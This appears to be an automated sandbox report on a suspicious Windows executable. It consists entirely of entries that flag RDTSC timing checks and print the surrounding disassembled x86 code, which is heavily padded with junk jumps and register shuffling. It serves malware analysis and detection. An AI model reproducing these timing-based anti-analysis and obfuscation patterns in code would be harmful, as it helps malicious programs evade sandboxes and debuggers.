Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0645 second address: 4CC06BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F075CBABED7h 0x00000009 sub cx, D00Eh 0x0000000e jmp 00007F075CBABED9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F075CBABED0h 0x0000001a sub ecx, 3FAAEE88h 0x00000020 jmp 00007F075CBABECBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F075CBABED0h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC06BA second address: 4CC06BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC06BE second address: 4CC06C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC06C4 second address: 4CC06D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F075D128EFDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC06D5 second address: 4CC06D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE01A9 second address: 4CE01AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE01AD second address: 4CE01B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE01B1 second address: 4CE01B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE01B7 second address: 4CE0204 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABED6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov bh, ch 0x0000000d push ebx 0x0000000e movzx esi, di 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 jmp 00007F075CBABED1h 0x00000019 xchg eax, ebp 0x0000001a jmp 00007F075CBABECEh 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0204 second address: 4CE0208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0208 second address: 4CE0225 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABED9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0225 second address: 4CE0239 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 9Ah 0x00000005 mov eax, 3AD4835Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0239 second address: 4CE023D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE023D second address: 4CE0241 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0241 second address: 4CE0247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE03F2 second address: 4CE0423 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F075D128F09h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov dh, 95h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0423 second address: 4CE0428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0428 second address: 4CE043A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F075D128EFEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D0069A second address: 4D006CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 movsx ebx, cx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F075CBABED5h 0x00000012 xchg eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F075CBABECDh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D006CC second address: 4D006E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128F01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D006E9 second address: 4D006EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D006EF second address: 4D006F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D006F5 second address: 4D00709 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov si, bx 0x0000000f mov di, FBF4h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00709 second address: 4D00728 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F075D128EFEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00728 second address: 4D00745 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F075CBABECDh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d pushad 0x0000000e mov esi, 55A65869h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00745 second address: 4D007AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 call 00007F075D128F04h 0x0000000a pushfd 0x0000000b jmp 00007F075D128F02h 0x00000010 and al, 00000068h 0x00000013 jmp 00007F075D128EFBh 0x00000018 popfd 0x00000019 pop eax 0x0000001a popad 0x0000001b mov eax, dword ptr [76FA65FCh] 0x00000020 jmp 00007F075D128EFFh 0x00000025 test eax, eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F075D128F05h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D007AF second address: 4D007BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F075CBABECCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D007BF second address: 4D007DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F07CF34C08Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D007DC second address: 4D007E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D007E0 second address: 4D007E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D007E6 second address: 4D007EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D007EC second address: 4D007F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D007F0 second address: 4D00870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, eax 0x0000000a jmp 00007F075CBABED0h 0x0000000f xor eax, dword ptr [ebp+08h] 0x00000012 pushad 0x00000013 mov ecx, edi 0x00000015 pushfd 0x00000016 jmp 00007F075CBABED3h 0x0000001b sub ax, EE7Eh 0x00000020 jmp 00007F075CBABED9h 0x00000025 popfd 0x00000026 popad 0x00000027 and ecx, 1Fh 0x0000002a jmp 00007F075CBABECEh 0x0000002f ror eax, cl 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F075CBABED7h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00870 second address: 4D00888 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F075D128F04h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00888 second address: 4D008B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABECBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b leave 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F075CBABED5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D008B1 second address: 4D008C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 push esi 0x00000007 pop edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b retn 0004h 0x0000000e nop 0x0000000f mov esi, eax 0x00000011 lea eax, dword ptr [ebp-08h] 0x00000014 xor esi, dword ptr [00372014h] 0x0000001a push eax 0x0000001b push eax 0x0000001c push eax 0x0000001d lea eax, dword ptr [ebp-10h] 0x00000020 push eax 0x00000021 call 00007F0761AF96F5h 0x00000026 push FFFFFFFEh 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D008C7 second address: 4D008CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D008CB second address: 4D008E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128F03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D008E2 second address: 4D008E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D008E8 second address: 4D008EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D008EC second address: 4D0093F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABECBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c jmp 00007F075CBABED6h 0x00000011 ret 0x00000012 nop 0x00000013 push eax 0x00000014 call 00007F076157C714h 0x00000019 mov edi, edi 0x0000001b jmp 00007F075CBABED0h 0x00000020 xchg eax, ebp 0x00000021 jmp 00007F075CBABED0h 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D0093F second address: 4D00943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00943 second address: 4D00947 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00947 second address: 4D0094D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D0094D second address: 4D00963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F075CBABED2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00963 second address: 4D00967 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB002F second address: 4CB0033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0033 second address: 4CB0075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F075D128EFEh 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F075D128F00h 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F075D128F07h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0075 second address: 4CB0092 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 call 00007F075CBABECBh 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e and esp, FFFFFFF8h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0092 second address: 4CB0096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0096 second address: 4CB00A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABECCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB00A6 second address: 4CB0175 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F075D128F06h 0x0000000f push eax 0x00000010 jmp 00007F075D128EFBh 0x00000015 xchg eax, ecx 0x00000016 pushad 0x00000017 jmp 00007F075D128F04h 0x0000001c pushfd 0x0000001d jmp 00007F075D128F02h 0x00000022 sbb cx, B6C8h 0x00000027 jmp 00007F075D128EFBh 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, ebx 0x0000002f pushad 0x00000030 mov edi, eax 0x00000032 popad 0x00000033 push eax 0x00000034 pushad 0x00000035 call 00007F075D128EFAh 0x0000003a pop edx 0x0000003b mov esi, 1607757Dh 0x00000040 popad 0x00000041 xchg eax, ebx 0x00000042 pushad 0x00000043 pushfd 0x00000044 jmp 00007F075D128F06h 0x00000049 sbb eax, 1B936B88h 0x0000004f jmp 00007F075D128EFBh 0x00000054 popfd 0x00000055 mov ebx, ecx 0x00000057 popad 0x00000058 mov ebx, dword ptr [ebp+10h] 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e mov eax, edi 0x00000060 jmp 00007F075D128F03h 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0175 second address: 4CB017B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB017B second address: 4CB017F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB017F second address: 4CB01E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a mov edx, eax 0x0000000c pushad 0x0000000d movzx ecx, bx 0x00000010 mov dx, B8F4h 0x00000014 popad 0x00000015 popad 0x00000016 mov dword ptr [esp], esi 0x00000019 jmp 00007F075CBABED3h 0x0000001e mov esi, dword ptr [ebp+08h] 0x00000021 jmp 00007F075CBABED6h 0x00000026 xchg eax, edi 0x00000027 jmp 00007F075CBABED0h 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F075CBABECDh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB01E7 second address: 4CB01ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB01ED second address: 4CB0204 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F075CBABED3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0204 second address: 4CB022B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128F09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov si, di 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB022B second address: 4CB0231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0231 second address: 4CB029A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007F075D128F09h 0x0000000f je 00007F07CF3972B7h 0x00000015 pushad 0x00000016 jmp 00007F075D128EFCh 0x0000001b mov dx, cx 0x0000001e popad 0x0000001f cmp dword ptr [esi+08h], DDEEDDEEh 0x00000026 pushad 0x00000027 mov ch, 52h 0x00000029 mov dx, 3E2Ah 0x0000002d popad 0x0000002e je 00007F07CF3972A7h 0x00000034 jmp 00007F075D128F01h 0x00000039 mov edx, dword ptr [esi+44h] 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB029A second address: 4CB02AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABECFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB02AD second address: 4CB030A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128F09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c jmp 00007F075D128EFEh 0x00000011 test edx, 61000000h 0x00000017 pushad 0x00000018 mov bx, si 0x0000001b popad 0x0000001c jne 00007F07CF397298h 0x00000022 jmp 00007F075D128EFFh 0x00000027 test byte ptr [esi+48h], 00000001h 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov di, 91C6h 0x00000032 mov si, di 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB030A second address: 4CB0310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0711 second address: 4CA0740 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128F01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx ecx, di 0x0000000e push ebx 0x0000000f push esi 0x00000010 pop ebx 0x00000011 pop eax 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F075D128EFDh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0740 second address: 4CA0750 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F075CBABECCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0750 second address: 4CA0789 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F075D128F08h 0x00000012 add si, 2308h 0x00000017 jmp 00007F075D128EFBh 0x0000001c popfd 0x0000001d push ecx 0x0000001e pop edi 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0789 second address: 4CA07B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F075CBABECBh 0x00000009 adc cl, 0000004Eh 0x0000000c jmp 00007F075CBABED9h 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA07B7 second address: 4CA07DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F075D128F06h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA07DA second address: 4CA07E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABECBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA07E9 second address: 4CA0856 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F075D128EFFh 0x00000009 adc ah, FFFFFFBEh 0x0000000c jmp 00007F075D128F09h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F075D128F00h 0x00000018 add ah, FFFFFFB8h 0x0000001b jmp 00007F075D128EFBh 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 and esp, FFFFFFF8h 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F075D128F05h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0856 second address: 4CA08F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABED1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F075CBABECEh 0x0000000f push eax 0x00000010 jmp 00007F075CBABECBh 0x00000015 xchg eax, ebx 0x00000016 pushad 0x00000017 call 00007F075CBABED4h 0x0000001c mov edi, eax 0x0000001e pop ecx 0x0000001f call 00007F075CBABED7h 0x00000024 movzx esi, bx 0x00000027 pop ebx 0x00000028 popad 0x00000029 xchg eax, esi 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F075CBABECEh 0x00000031 adc cx, 9868h 0x00000036 jmp 00007F075CBABECBh 0x0000003b popfd 0x0000003c movzx ecx, di 0x0000003f popad 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F075CBABED1h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA08F5 second address: 4CA0905 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F075D128EFCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0905 second address: 4CA0909 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0909 second address: 4CA0932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007F075D128F07h 0x0000000e mov esi, dword ptr [ebp+08h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0932 second address: 4CA094D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABED7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA094D second address: 4CA09B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F075D128EFFh 0x00000009 and cl, FFFFFFCEh 0x0000000c jmp 00007F075D128F09h 0x00000011 popfd 0x00000012 mov dl, cl 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebx, 00000000h 0x0000001c jmp 00007F075D128F08h 0x00000021 test esi, esi 0x00000023 pushad 0x00000024 mov ecx, 4A81568Dh 0x00000029 mov esi, 1039CE89h 0x0000002e popad 0x0000002f je 00007F07CF39E8D7h 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA09B8 second address: 4CA09D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F075CBABED7h 0x00000009 pop esi 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA09D5 second address: 4CA0A0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128F06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F075D128F07h 0x00000017 rdtsc
